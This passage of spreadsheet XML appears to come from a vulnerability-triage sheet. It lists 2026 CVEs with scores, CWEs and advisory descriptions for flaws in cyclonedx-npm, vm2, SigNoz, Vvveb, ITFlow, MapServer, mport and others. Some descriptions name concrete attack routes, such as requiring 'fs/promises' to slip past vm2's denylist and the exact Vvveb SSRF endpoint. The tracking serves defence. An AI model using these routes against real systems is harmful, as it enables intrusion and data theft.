    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71538</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr">
        <is>
          <t>npm:@cyclonedx/cyclonedx-npm</t>
        </is>
      </c>
      <c r="M108" s="5" t="inlineStr">
        <is>
          <t>6.0.0</t>
        </is>
      </c>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>@cyclonedx/cyclonedx-npm creates CycloneDX Software Bill of Materials from npm projects. Prior to version 6.0.0, the Windows fallback path in src/npmRunner.ts, used when npm_execpath does not provide the npm CLI path, can construct a shell command containing an untrusted value from the --workspace option. When an attacker can influence that option and the fallback npm execution path is reached, shell metacharacters in the workspace value can execute arbitrary operating-system commands with the privileges of the user running the CLI, allowing data access, file modification, or service disruption. This issue is fixed in version 6.0.0.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71538</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92958</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>vm2 through 3.11.6 contains a builtin-module denylist bypass in NodeVM. When the embedder uses the builtin wildcard together with negative entries (e.g. require: { builtin: ['*', '-fs', '-child_process'] }), negative entries are matched by exact module name in lib/builtin.js, so -fs removes only the builtin named fs and does not remove builtin subpaths such as fs/promises. Sandboxed code can therefore call require('fs/promises') or require('node:fs/promises') and reach the promise-based filesystem API despite fs being denied; node: prefix handling is likewise inconsistent (a -node:fs/promises entry does not block require('fs/promises')). Host file creation and writing were confirmed via fsp.writeFile(), and other fs/promises operations (cp, mkdir, rename, rm, rmdir, truncate, read operations, etc.) are also reachable. This issue is fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92958</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93292</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>SigNoz versions from 0.88.0 before 0.142.1 contain a SQL injection vulnerability in trace-funnel analytics endpoints that interpolate service_name and span_name fields into ClickHouse string literals without escaping. Authenticated attackers can inject SQL through funnel step definitions to execute arbitrary queries and read results in HTTP responses.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93292</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93426</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>SigNoz versions 0.87.0 before 0.142.0 fail to escape user-supplied telemetry field-key names in the v5 query_range API, allowing authenticated users to inject SQL. Attackers with Viewer role or higher can embed backticks and quotes in field names to break out of identifiers and string literals, executing arbitrary ClickHouse SQL to read system tables and exfiltrate data.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93426</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54507</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.5, the oEmbedProxy() handler in admin/controller/editor/editor.php accepts an attacker-controlled url parameter and passes it to getUrl(), while validateUrl() in system/functions.php checks only the hostname string and does not validate its resolved addresses. An authenticated admin-panel user with editor/* permission can invoke GET /admin/index.php?module=editor/editor&amp;action=oEmbedProxy with a dotted hostname or normalized loopback form that resolves to a private, loopback, link-local, or reserved address, causing the server to issue an HTTP or HTTPS request and return the response body. Storefront users and anonymous visitors cannot invoke the endpoint, but no CSRF token is required because the action uses GET. This can disclose internal service responses or cloud instance metadata and associated credentials. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54507</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55062</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-23, CWE-36, CWE-73</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>uniget is a universal installer and updater for (container) tools. Prior to 0.27.6, the hooks edit command in cmd/uniget/hooks.go concatenates an unvalidated hook filename with the selected hooks directory, allowing parent-directory components to escape that directory. The resulting path is passed to the configured editor, which can access or modify files outside the hooks directory with the privileges of the uniget process account. This issue is fixed in version 0.27.6.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55062</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54580</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-354, CWE-755</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, libmport/util.c did not make every truncated, corrupt, or failed zstd stream fatal in mport_decompress_zstd(), and libmport/fetch.c did not consistently propagate those failures to index-fetch callers. A malicious or faulty mirror could supply compressed package index data that caused ZSTD_decompressStream() or an output write to fail while leaving partial index output available for later use, resulting in package-index integrity loss or denial of service. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54580</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54581</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, the mport_fetch_bootstrap_index() function in libmport/fetch.c could return success when bootstrap index hash verification encountered a missing or invalid hash because the failure path did not preserve a fatal result. A network attacker or compromised mirror able to alter bootstrap index content or its transport path could therefore cause mport to proceed with an unverified or tampered bootstrap package index. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54581</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54583</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, libmport/fetch.c did not consistently reject empty, dot, dot-dot, or slash-containing bundle filenames before composing package download and write paths. Malicious package index data could place an unsafe value in indexEntry-&gt;bundlefile, and the missing is_valid_bundle_filename() checks allowed downloaded package data to be written outside the intended cache location or to an unsafe destination name. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54583</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54597</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>ITFlow provides an IT documentation, ticketing and accounting system for small managed service providers. Prior to version 26.07, an authenticated user with module_support write permission and access to a credential record can perform time-based blind SQL injection through the expires parameter of the share_generate_link handler in agent/ajax.php. sanitizeInput applies string-context escaping, but expires is inserted unquoted into the item_expire_at MySQL INTERVAL expression, allowing a crafted expression and interval unit to execute conditional database queries whose results are inferred from response delays. This can expose password hashes, SMTP credentials, API keys, encrypted vault data, and database metadata and support administrative takeover after credential cracking. This issue is fixed in version 26.07.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54597</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54253</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>TS3 Manager is modern web interface for maintaining Teamspeak3 servers. Prior to 2.2.6, the /api/download handler in packages/server/routes/api.js passes the attacker-controlled port query parameter to socket.connect(port, host) and returns the resulting error.message through res.status(400).send(error.message) as text/html without a Content Security Policy. When a logged-in operator follows a crafted top-level link, the reflected value executes in the manager origin. The token cookie set in packages/ui/src/store/modules/query.js lacks HttpOnly, Secure, and an explicit SameSite attribute, allowing the script to read the token and call the autofillform event in packages/server/socket.js. autofillform returns the decoded JWT, including the cleartext ServerQuery password, enabling operator-session hijacking and control of the managed TeamSpeak server when the operator uses administrative ServerQuery credentials. A valid operator session and user interaction are required. This issue is fixed in 2.2.6.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54253</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54354</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>MapServer is a system for developing web-based GIS applications. Prior to 8.6.4, MapServer's PostGIS runtime filter translation in src/mappostgis.cpp and msPostGISLayerTranslateFilter() treats a filteritem as numeric when CONNECTIONTYPE POSTGIS and metadata such as gml_&lt;item&gt;_type=Integer are configured, but it does not verify that attacker-controlled CGI qstring or OGC API Features featureId input is a numeric literal. The unquoted input is concatenated into the generated PostgreSQL/PostGIS predicate, allowing an unauthenticated remote attacker with access to an affected query endpoint to bypass predicates, enumerate unintended records, perform boolean-based or time-based SQL injection, and increase database load. The issue does not by itself establish database modification capabilities. This issue is fixed in version 8.6.4.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54354</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54451</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>Elixir protobuf is a pure Elixir implementation of Google Protobuf. From 0.8.0 until 0.16.1, services that decode attacker-controlled protobuf bytes with Protobuf.Decoder can be taken offline when the schema contains a self-referential or cyclic message type. In lib/protobuf/decoder.ex, Protobuf.Decoder.value_for_field/3 handles an embedded?: true field by recursively entering the decode / build_message / handle_value / value_for_field call chain without enforcing a nesting-depth limit. Deeply nested embedded fields retain non-tail recursive frames, allowing a comparatively small request to consume substantial CPU and memory, pin a BEAM scheduler, and exhaust the node. This issue is fixed in version 0.16.1.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54451</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56795</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>Dell Server Update Utility, versions prior to 26.07.01, contains an Uncontrolled Search Path Element vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56795</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82760</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
